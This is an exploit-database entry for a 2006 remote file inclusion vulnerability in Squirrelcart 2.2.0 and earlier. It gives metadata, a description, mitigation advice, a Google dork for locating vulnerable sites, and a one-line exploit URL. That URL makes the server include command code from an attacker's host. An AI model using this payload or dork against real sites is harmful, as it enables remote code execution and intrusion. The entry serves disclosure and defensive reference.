header-logo
Suggest Exploit
vendor:
Squirrelcart
by:
OLiBekaS
9,3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Squirrelcart
Affected Version From: 2.2.0
Affected Version To: 2.2.0
Patch Exists: YES
Related CWE: N/A
CPE: squirrelcart
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Squirrelcart <= 2.2.0 Remote File Inclusion

A remote file inclusion vulnerability exists in Squirrelcart version 2.2.0 and earlier. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious URL to the vulnerable application. This can allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in web requests. Additionally, ensure that the web application is running with the least privileges necessary.
Source

Exploit-DB raw data:

Title         : Squirrelcart <= 2.2.0 Remote File Inclusion
URL           : http://www.ldev.com/
google Dork   : inurl:/squirrelcart/
Author        : OLiBekaS
greetz        : Skulmatic, weleh, brokencode, bigmaster and all #papmahackerlink crew

Exploit       : /cart_content.php?cart_isp_root=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-05-15]

Navigation

Suggest Exploit

Services By CQR